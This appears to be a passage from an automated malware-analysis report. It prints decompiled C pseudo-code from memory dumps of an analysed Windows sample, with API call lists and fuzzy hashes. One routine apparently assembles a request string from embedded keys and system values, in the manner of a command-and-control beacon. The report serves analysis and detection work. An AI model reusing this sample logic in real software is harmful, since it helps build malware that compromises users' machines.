                        									if((_v16 & 0x000000cc) == 0) {
                        										L46:
                        										_t63 = 1;
                        										 *0x50a378 = 1;
                        										__eflags =  *0x50a378;
                        										if( *0x50a378 != 0) {
                        											goto L60;
                        										}
                        										_t84 =  *0x50a330; // 0x0
                        										__eflags = _t84;
                        										_t93 = _t84;
                        										if(_t84 <= 0) {
                        											L51:
                        											__eflags = _t93;
                        											if(_t93 != 0) {
                        												L58:
                        												 *0x50a378 = 0;
                        												goto L5;
                        											}
                        											_t77 = 0xf;
                        											__eflags = _t84 - _t77;
                        											if(_t84 <= _t77) {
                        												_t77 = _t84;
                        											}
                        											_t94 = 0;
                        											__eflags = _t77;
                        											if(_t77 < 0) {
                        												L56:
                        												__eflags = _t84 - 0x10;
                        												if(_t84 < 0x10) {
                        													_t86 = _t84 + 1;
                        													__eflags = _t86;
                        													 *0x50a330 = _t86;
                        												}
                        												goto L58;
                        											} else {
                        												do {
                        													_t68 = 0x50a338 + _t94 * 4;
                        													_t94 = _t94 + 1;
                        													__eflags = _t94 - _t77;
                        													 *_t68 = _t110;
                        													_t110 =  *_t68;
                        												} while (_t94 <= _t77);
                        												goto L56;
                        											}
                        										}
                        										_t69 = 0x50a334 + _t84 * 4;
                        										while(1) {
                        											__eflags =  *_t69 - _t110;
                        											if( *_t69 == _t110) {
                        												goto L51;
                        											}
                        											_t93 = _t93 - 1;
                        											_t69 = _t69 - 4;
                        											__eflags = _t93;
                        											if(_t93 > 0) {
                        												continue;
                        											}
                        											goto L51;
                        										}
                        										goto L51;
                        									}
                        									_t87 = _v32;
                        									__eflags =  *_t87 - 0x5a4d;
                        									if( *_t87 != 0x5a4d) {
                        										goto L59;
                        									}
                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                        									__eflags =  *_t71 - 0x4550;
                        									if( *_t71 != 0x4550) {
                        										goto L59;
                        									}
                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                        										goto L59;
                        									}
                        									_t78 = _t76 - _t87;
                        									__eflags =  *((short*)(_t71 + 6));
                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                        									if( *((short*)(_t71 + 6)) <= 0) {
                        										goto L59;
                        									}
                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                        									__eflags = _t78 - _t72;
                        									if(_t78 < _t72) {
                        										goto L46;
                        									}
                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                        										goto L46;
                        									}
                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                        										goto L20;
                        									}
                        									goto L46;
                        								}
                        							} else {
                        								goto L16;
                        							}
                        							while(1) {
                        								L16:
                        								__eflags =  *((intOrPtr*)(0x50a338 + _t58 * 4)) - _t110;
                        								if( *((intOrPtr*)(0x50a338 + _t58 * 4)) == _t110) {
                        									break;
                        								}
                        								_t58 = _t58 + 1;
                        								__eflags = _t58 - _t81;
                        								if(_t58 < _t81) {
                        									continue;
                        								}
                        								goto L18;
                        							}
                        							__eflags = _t58;
                        							if(_t58 <= 0) {
                        								goto L5;
                        							}
                        							 *0x50a378 = 1;
                        							__eflags =  *0x50a378;
                        							if( *0x50a378 != 0) {
                        								goto L5;
                        							}
                        							__eflags =  *((intOrPtr*)(0x50a338 + _t58 * 4)) - _t110;
                        							if( *((intOrPtr*)(0x50a338 + _t58 * 4)) == _t110) {
                        								L32:
                        								_t100 = 0;
                        								__eflags = _t58;
                        								if(_t58 < 0) {
                        									L34:
                        									 *0x50a378 = 0;
                        									goto L5;
                        								} else {
                        									goto L33;
                        								}
                        								do {
                        									L33:
                        									_t90 = 0x50a338 + _t100 * 4;
                        									_t100 = _t100 + 1;
                        									__eflags = _t100 - _t58;
                        									 *_t90 = _t110;
                        									_t110 =  *_t90;
                        								} while (_t100 <= _t58);
                        								goto L34;
                        							}
                        							_t25 = _t81 - 1; // -1
                        							_t58 = _t25;
                        							__eflags = _t58;
                        							if(_t58 < 0) {
                        								L28:
                        								__eflags = _t81 - 0x10;
                        								if(_t81 < 0x10) {
                        									_t81 = _t81 + 1;
                        									__eflags = _t81;
                        									 *0x50a330 = _t81;
                        								}
                        								_t28 = _t81 - 1; // 0x0
                        								_t58 = _t28;
                        								goto L32;
                        							} else {
                        								goto L25;
                        							}
                        							while(1) {
                        								L25:
                        								__eflags =  *((intOrPtr*)(0x50a338 + _t58 * 4)) - _t110;
                        								if( *((intOrPtr*)(0x50a338 + _t58 * 4)) == _t110) {
                        									break;
                        								}
                        								_t58 = _t58 - 1;
                        								__eflags = _t58;
                        								if(_t58 >= 0) {
                        									continue;
                        								}
                        								break;
                        							}
                        							__eflags = _t58;
                        							if(__eflags >= 0) {
                        								if(__eflags == 0) {
                        									goto L34;
                        								}
                        								goto L32;
                        							}
                        							goto L28;
                        						}
                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                        						__eflags = _t75 - _v8;
                        						if(_t75 < _v8) {
                        							goto L20;
                        						}
                        						__eflags = _t75 - _t108;
                        						if(_t75 >= _t108) {
                        							goto L20;
                        						}
                        						goto L15;
                        					}
                        					L5:
                        					_t63 = 1;
                        					goto L60;
                        				} else {
                        					goto L3;
                        				}
                        			}

                        APIs
                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0050827E
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: MemoryQueryVirtual
                        • String ID:
                        • API String ID: 2850889275-0
                        • Opcode ID: 17680fe9cebdb0ce39bf6955e02cd361ca3e7cbdd632278c6bcbc9edfd8fc186
                        • Instruction ID: bf7bf0866ec6934304f7e6250555f967e9ac2409c952cd172382fca03c08455b
                        • Opcode Fuzzy Hash: 17680fe9cebdb0ce39bf6955e02cd361ca3e7cbdd632278c6bcbc9edfd8fc186
                        • Instruction Fuzzy Hash: 2B61B135600B13CBDB29CE28C994EBD3BA5FBD5714B248939E896C72D1EF31DC428A44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • EnumSystemLocalesW.KERNEL32(6C54AAAC,00000001,?,6C5563F1,6C55648F,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6C54AAEE
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: EnumLocalesSystem
                        • String ID:
                        • API String ID: 2099609381-0
                        • Opcode ID: 1516d85c3c0ea9b9e439cd59ea372096b2d334b2329029d4ef715e2e60968774
                        • Instruction ID: 3fdabb59402d57fcc46de4f459a7d5cf9e616cad950ede132e415ae0bdecd7e9
                        • Opcode Fuzzy Hash: 1516d85c3c0ea9b9e439cd59ea372096b2d334b2329029d4ef715e2e60968774
                        • Instruction Fuzzy Hash: C6E08C31210248ABDF01CFE9DC01F693BF6FB49710F018020F50C4A8B0C372A5609F84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,20001004,?,6C54FC05,?,6C54FC05,?,20001004,?,00000002,?,00000004,?,00000000), ref: 6C54AB24
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 40c96a25794284a97d5b1cd06cd651dd1bbb5aabfff4d64059a047b3aadd6f37
                        • Instruction ID: 9feb4640eedfa4323c29faa26393e4248b273554dd3350b9c0ccc555aaacd82c
                        • Opcode Fuzzy Hash: 40c96a25794284a97d5b1cd06cd651dd1bbb5aabfff4d64059a047b3aadd6f37
                        • Instruction Fuzzy Hash: 2BD05E3200010DFFDF019FD5EC05CBA3BB9FB49329B018415F91846920D732A960DB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetProcessHeap.KERNEL32(6C54563F,6C55B7B8,00000008,6C545815,?,00000001,?,6C55B7D8,0000000C,6C5457B4,?,00000001,?), ref: 6C54B524
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 3e7c44110bcbac96200bddbb0aa525e93c194519115f249aa5f3559cc17fec9b
                        • Instruction ID: 53a55b3bc20f4dc184ffe1edd0eebf926630cc040e56198389fa7612729001ef
                        • Opcode Fuzzy Hash: 3e7c44110bcbac96200bddbb0aa525e93c194519115f249aa5f3559cc17fec9b
                        • Instruction Fuzzy Hash: 15B012B0306182474F084B3D94243393AF8570D202306403D7003C19A0DF30C4109F00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E00507FA8(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                        				intOrPtr _v8;
                        				char _v12;
                        				void* __ebp;
                        				signed int* _t43;
                        				char _t44;
                        				void* _t46;
                        				void* _t49;
                        				intOrPtr* _t53;
                        				void* _t54;
                        				void* _t65;
                        				long _t66;
                        				signed int* _t80;
                        				signed int* _t82;
                        				void* _t84;
                        				signed int _t86;
                        				void* _t89;
                        				void* _t95;
                        				void* _t96;
                        				void* _t99;
                        				void* _t106;
                        
                        				_t43 = _t84;
                        				_t65 = __ebx + 2;
                        				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                        				_t89 = _t95;
                        				_t96 = _t95 - 8;
                        				_push(_t65);
                        				_push(_t84);
                        				_push(_t89);
                        				asm("cld");
                        				_t66 = _a8;
                        				_t44 = _a4;
                        				if(( *(_t44 + 4) & 0x00000006) != 0) {
                        					_push(_t89);
                        					E00508113(_t66 + 0x10, _t66, 0xffffffff);
                        					_t46 = 1;
                        				} else {
                        					_v12 = _t44;
                        					_v8 = _a12;
                        					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                        					_t86 =  *(_t66 + 0xc);
                        					_t80 =  *(_t66 + 8);
                        					_t49 = E005081CD(_t66);
                        					_t99 = _t96 + 4;
                        					if(_t49 == 0) {
                        						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                        						goto L11;
                        					} else {
                        						while(_t86 != 0xffffffff) {
                        							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                        							if(_t53 == 0) {
                        								L8:
                        								_t80 =  *(_t66 + 8);
                        								_t86 = _t80[_t86 + _t86 * 2];
                        								continue;
                        							} else {
                        								_t54 =  *_t53();
                        								_t89 = _t89;
                        								_t86 = _t86;
                        								_t66 = _a8;
                        								_t55 = _t54;
                        								_t106 = _t54;
                        								if(_t106 == 0) {
                        									goto L8;
                        								} else {
                        									if(_t106 < 0) {
                        										_t46 = 0;
                        									} else {
                        										_t82 =  *(_t66 + 8);
                        										E005080B8(_t55, _t66);
                        										_t89 = _t66 + 0x10;
                        										E00508113(_t89, _t66, 0);
                        										_t99 = _t99 + 0xc;
                        										E005081AF(_t82[2]);
                        										 *(_t66 + 0xc) =  *_t82;
                        										_t66 = 0;
                        										_t86 = 0;
                        										 *(_t82[2])(1);
                        										goto L8;
                        									}
                        								}
                        							}
                        							goto L13;
                        						}
                        						L11:
                        						_t46 = 1;
                        					}
                        				}
                        				L13:
                        				return _t46;
                        			}

                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                        • Instruction ID: fe5bf50eadc74d0cfce9a8daa3076f2a7b34d37d02fac671a6c000b5adc37ace
                        • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                        • Instruction Fuzzy Hash: B421A472900205DFCB10EF69C899D7BBFA5BF44350B0985A9E9558B285DB30F919C7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E6C502264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                        				intOrPtr _v8;
                        				char _v12;
                        				void* __ebp;
                        				signed int* _t43;
                        				char _t44;
                        				void* _t46;
                        				void* _t49;
                        				intOrPtr* _t53;
                        				void* _t54;
                        				void* _t65;
                        				long _t66;
                        				signed int* _t80;
                        				signed int* _t82;
                        				void* _t84;
                        				signed int _t86;
                        				void* _t89;
                        				void* _t95;
                        				void* _t96;
                        				void* _t99;
                        				void* _t106;
                        
                        				_t43 = _t84;
                        				_t65 = __ebx + 2;
                        				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                        				_t89 = _t95;
                        				_t96 = _t95 - 8;
                        				_push(_t65);
                        				_push(_t84);
                        				_push(_t89);
                        				asm("cld");
                        				_t66 = _a8;
                        				_t44 = _a4;
                        				if(( *(_t44 + 4) & 0x00000006) != 0) {
                        					_push(_t89);
                        					E6C5023CB(_t66 + 0x10, _t66, 0xffffffff);
                        					_t46 = 1;
                        				} else {
                        					_v12 = _t44;
                        					_v8 = _a12;
                        					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                        					_t86 =  *(_t66 + 0xc);
                        					_t80 =  *(_t66 + 8);
                        					_t49 = E6C502485(_t66);
                        					_t99 = _t96 + 4;
                        					if(_t49 == 0) {
                        						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                        						goto L11;
                        					} else {
                        						while(_t86 != 0xffffffff) {
                        							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                        							if(_t53 == 0) {
                        								L8:
                        								_t80 =  *(_t66 + 8);
                        								_t86 = _t80[_t86 + _t86 * 2];
                        								continue;
                        							} else {
                        								_t54 =  *_t53();
                        								_t89 = _t89;
                        								_t86 = _t86;
                        								_t66 = _a8;
                        								_t55 = _t54;
                        								_t106 = _t54;
                        								if(_t106 == 0) {
                        									goto L8;
                        								} else {
                        									if(_t106 < 0) {
                        										_t46 = 0;
                        									} else {
                        										_t82 =  *(_t66 + 8);
                        										E6C502370(_t55, _t66);
                        										_t89 = _t66 + 0x10;
                        										E6C5023CB(_t89, _t66, 0);
                        										_t99 = _t99 + 0xc;
                        										E6C502467(_t82[2], 1);
                        										 *(_t66 + 0xc) =  *_t82;
                        										_t66 = 0;
                        										_t86 = 0;
                        										 *(_t82[2])();
                        										goto L8;
                        									}
                        								}
                        							}
                        							goto L13;
                        						}
                        						L11:
                        						_t46 = 1;
                        					}
                        				}
                        				L13:
                        				return _t46;
                        			}

                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.918341548.000000006C55E000.00000040.00020000.sdmp, Offset: 6C55E000, based on PE: false
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.918341548.000000006C55E000.00000040.00020000.sdmp, Offset: 6C55E000, based on PE: false
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E00506124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                        				intOrPtr _v4;
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				void* _v24;
                        				intOrPtr _v40;
                        				void* __ecx;
                        				void* __edi;
                        				intOrPtr _t31;
                        				intOrPtr _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				intOrPtr _t35;
                        				void* _t38;
                        				intOrPtr _t39;
                        				int _t42;
                        				void* _t43;
                        				intOrPtr _t44;
                        				intOrPtr _t48;
                        				intOrPtr _t52;
                        				intOrPtr _t55;
                        				intOrPtr _t56;
                        				intOrPtr _t62;
                        				intOrPtr _t66;
                        				intOrPtr* _t68;
                        				intOrPtr _t78;
                        				intOrPtr _t81;
                        				intOrPtr _t84;
                        				int _t87;
                        				intOrPtr _t88;
                        				int _t91;
                        				intOrPtr _t92;
                        				int _t95;
                        				void* _t98;
                        				void* _t99;
                        				void* _t103;
                        				intOrPtr _t105;
                        				long _t107;
                        				intOrPtr _t108;
                        				intOrPtr* _t109;
                        				long _t110;
                        				int _t111;
                        				void* _t112;
                        				void* _t113;
                        				void* _t114;
                        				void* _t115;
                        				void* _t117;
                        				void* _t118;
                        				void* _t120;
                        				void* _t121;
                        
                        				_t103 = __edx;
                        				_t110 = __eax;
                        				_v8 = 8;
                        				_t117 = RtlAllocateHeap( *0x50a290, 0, 0x800);
                        				if(_t117 != 0) {
                        					if(_t110 == 0) {
                        						_t110 = GetTickCount();
                        					}
                        					_t31 =  *0x50a018; // 0x5ffc1f8b
                        					asm("bswap eax");
                        					_t32 =  *0x50a014; // 0x5cb11ae7
                        					asm("bswap eax");
                        					_t33 =  *0x50a010; // 0x15dc9586
                        					asm("bswap eax");
                        					_t34 =  *0x50a00c; // 0x67522d90
                        					asm("bswap eax");
                        					_t35 =  *0x50a2d0; // 0x2add5a8
                        					_t2 = _t35 + 0x50b622; // 0x74666f73
                        					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0x50a02c,  *0x50a004, _t110);
                        					_t38 = E0050271A();
                        					_t39 =  *0x50a2d0; // 0x2add5a8
                        					_t3 = _t39 + 0x50b662; // 0x74707526
                        					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                        					_t120 = _t118 + 0x38;
                        					_t112 = _t111 + _t42;
                        					if(_a12 != 0) {
                        						_t92 =  *0x50a2d0; // 0x2add5a8
                        						_t7 = _t92 + 0x50b66d; // 0x732526
                        						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                        						_t120 = _t120 + 0xc;
                        						_t112 = _t112 + _t95;
                        					}
                        					_t43 = E00502956(_t99);
                        					_t44 =  *0x50a2d0; // 0x2add5a8
                        					_t9 = _t44 + 0x50b38a; // 0x6d697426
                        					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                        					_t48 =  *0x50a2d0; // 0x2add5a8
                        					_t11 = _t48 + 0x50b33b; // 0x74636126
                        					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                        					_t52 =  *0x50a328; // 0x2fe95b0
                        					_t121 = _t120 + 0x1c;
                        					if(_t52 != 0) {
                        						_t88 =  *0x50a2d0; // 0x2add5a8
                        						_t13 = _t88 + 0x50b685; // 0x73797326
                        						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                        						_t121 = _t121 + 0xc;
                        						_t114 = _t114 + _t91;
                        					}
                        					_t105 =  *0x50a37c; // 0x2fe9630
                        					_a28 = E00505741(0x50a00a, _t105 + 4);
                        					_t55 =  *0x50a318; // 0x2fe95e0
                        					_t107 = 0;
                        					if(_t55 != 0) {
                        						_t84 =  *0x50a2d0; // 0x2add5a8
                        						_t16 = _t84 + 0x50b8ea; // 0x3d736f26
                        						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                        						_t121 = _t121 + 0xc;
                        						_t114 = _t114 + _t87;
                        					}
                        					_t56 =  *0x50a314; // 0x0
                        					if(_t56 != _t107) {
                        						_t81 =  *0x50a2d0; // 0x2add5a8
                        						_t18 = _t81 + 0x50b8c1; // 0x3d706926
                        						wsprintfA(_t114 + _t117, _t18, _t56);
                        					}
                        					if(_a28 != _t107) {
                        						_t98 = RtlAllocateHeap( *0x50a290, _t107, 0x800);
                        						if(_t98 != _t107) {
                        							E00501A51(GetTickCount());
                        							_t62 =  *0x50a37c; // 0x2fe9630
                        							__imp__(_t62 + 0x40);
                        							asm("lock xadd [eax], ecx");
                        							_t66 =  *0x50a37c; // 0x2fe9630
                        							__imp__(_t66 + 0x40);
                        							_t68 =  *0x50a37c; // 0x2fe9630
                        							_t115 = E00505AE3(1, _t103, _t117,  *_t68);
                        							asm("lock xadd [eax], ecx");
                        							if(_t115 != _t107) {
                        								StrTrimA(_t115, 0x5092cc);
                        								_push(_t115);
                        								_t108 = E00502829();
                        								_v4 = _t108;
                        								if(_t108 != 0) {
                        									 *_t115 = 0;
                        									__imp__(_t98, _a8);
                        									_t109 = __imp__;
                        									 *_t109(_t98, _t108);
                        									 *_t109(_t98, _t115);
                        									_t78 = E00503B46(0xffffffffffffffff, _t98, _v12, _v8);
                        									_v40 = _t78;
                        									if(_t78 != 0 && _t78 != 0x10d2) {
                        										E00502813();
                        									}
                        									HeapFree( *0x50a290, 0, _v24);
                        								}
                        								HeapFree( *0x50a290, 0, _t115);
                        								_t107 = 0;
                        							}
                        							HeapFree( *0x50a290, _t107, _t98);
                        						}
                        						HeapFree( *0x50a290, _t107, _a20);
                        					}
                        					HeapFree( *0x50a290, _t107, _t117);
                        				}
                        				return _v16;
                        			}

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00506142
                        • GetTickCount.KERNEL32 ref: 00506156
                        • wsprintfA.USER32 ref: 005061A5
                        • wsprintfA.USER32 ref: 005061C2
                        • wsprintfA.USER32 ref: 005061E3
                        • wsprintfA.USER32 ref: 00506201
                        • wsprintfA.USER32 ref: 00506216
                        • wsprintfA.USER32 ref: 00506237
                        • wsprintfA.USER32 ref: 00506271
                        • wsprintfA.USER32 ref: 00506291
                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005062AC
                        • GetTickCount.KERNEL32 ref: 005062BC
                        • RtlEnterCriticalSection.NTDLL(02FE95F0), ref: 005062D0
                        • RtlLeaveCriticalSection.NTDLL(02FE95F0), ref: 005062EE
                          • Part of subcall function 00505AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B0E
                          • Part of subcall function 00505AE3: lstrlen.KERNEL32(00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B16
                          • Part of subcall function 00505AE3: strcpy.NTDLL ref: 00505B2D
                          • Part of subcall function 00505AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00505B38
                          • Part of subcall function 00505AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00505B55
                        • StrTrimA.SHLWAPI(00000000,005092CC,00000000,02FE9630), ref: 0050631C
                          • Part of subcall function 00502829: lstrlen.KERNEL32(02FE887A,00000000,00000000,00000000,00506328,00000000), ref: 00502839
                          • Part of subcall function 00502829: lstrlen.KERNEL32(?), ref: 00502841
                          • Part of subcall function 00502829: lstrcpy.KERNEL32(00000000,02FE887A), ref: 00502855
                          • Part of subcall function 00502829: lstrcat.KERNEL32(00000000,?), ref: 00502860
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050633A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00506348
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050634C
                        • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0050637C
                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0050638B
                        • HeapFree.KERNEL32(00000000,00000000,00000000,02FE9630), ref: 0050639B
                        • HeapFree.KERNEL32(00000000,?), ref: 005063AC
                        • HeapFree.KERNEL32(00000000,00000000), ref: 005063BA
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                        • API String ID: 1837416118-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlDecodePointer.NTDLL ref: 6C54AF65
                        • _free.LIBCMT ref: 6C54AF7E
                          • Part of subcall function 6C543F97: HeapFree.KERNEL32(00000000,00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FAB
                          • Part of subcall function 6C543F97: GetLastError.KERNEL32(00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FBD
                        • _free.LIBCMT ref: 6C54AF91
                        • _free.LIBCMT ref: 6C54AFAF
                        • _free.LIBCMT ref: 6C54AFC1
                        • _free.LIBCMT ref: 6C54AFD2
                        • _free.LIBCMT ref: 6C54AFDD
                        • _free.LIBCMT ref: 6C54B001
                        • RtlEncodePointer.NTDLL(6D569338), ref: 6C54B008
                        • _free.LIBCMT ref: 6C54B01D
                        • _free.LIBCMT ref: 6C54B033
                        • _free.LIBCMT ref: 6C54B05B
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                        • API String ID: 3064303923-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 27%
                        			E0050762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				long _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				void* __esi;
                        				long _t43;
                        				intOrPtr _t44;
                        				intOrPtr _t46;
                        				void* _t48;
                        				void* _t49;
                        				void* _t50;
                        				intOrPtr _t54;
                        				intOrPtr _t57;
                        				void* _t58;
                        				void* _t59;
                        				void* _t60;
                        				intOrPtr _t66;
                        				void* _t71;
                        				void* _t74;
                        				intOrPtr _t75;
                        				void* _t77;
                        				intOrPtr _t79;
                        				intOrPtr* _t80;
                        				intOrPtr _t91;
                        
                        				_t79 =  *0x50a38c; // 0x2fe9cd0
                        				_v24 = 8;
                        				_t43 = GetTickCount();
                        				_push(5);
                        				_t74 = 0xa;
                        				_v16 = _t43;
                        				_t44 = E00505F43(_t74,  &_v16);
                        				_v8 = _t44;
                        				if(_t44 == 0) {
                        					_v8 = 0x5091cc;
                        				}
                        				_t46 = E005043FD(_t79);
                        				_v12 = _t46;
                        				if(_t46 != 0) {
                        					_t80 = __imp__;
                        					_t48 =  *_t80(_v8, _t71);
                        					_t49 =  *_t80(_v12);
                        					_t50 =  *_t80(_a4);
                        					_t54 = E00505C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                        					_v20 = _t54;
                        					if(_t54 != 0) {
                        						_t75 =  *0x50a2d0; // 0x2add5a8
                        						_t16 = _t75 + 0x50bad8; // 0x530025
                        						 *0x50a13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                        						_push(4);
                        						_t77 = 5;
                        						_t57 = E00505F43(_t77,  &_v16);
                        						_v8 = _t57;
                        						if(_t57 == 0) {
                        							_v8 = 0x5091d0;
                        						}
                        						_t58 =  *_t80(_v8);
                        						_t59 =  *_t80(_v12);
                        						_t60 =  *_t80(_a4);
                        						_t91 = E00505C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                        						if(_t91 == 0) {
                        							E00502A03(_v20);
                        						} else {
                        							_t66 =  *0x50a2d0; // 0x2add5a8
                        							_t31 = _t66 + 0x50bbf8; // 0x73006d
                        							 *0x50a13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                        							 *_a16 = _v20;
                        							_v24 = _v24 & 0x00000000;
                        							 *_a20 = _t91;
                        						}
                        					}
                        					E00502A03(_v12);
                        				}
                        				return _v24;
                        			}


                        APIs
                        • GetTickCount.KERNEL32 ref: 00507641
                        • lstrlen.KERNEL32(?,80000002,00000005), ref: 00507681
                        • lstrlen.KERNEL32(00000000), ref: 0050768A
                        • lstrlen.KERNEL32(00000000), ref: 00507691
                        • lstrlenW.KERNEL32(80000002), ref: 0050769E
                        • lstrlen.KERNEL32(?,00000004), ref: 005076FE
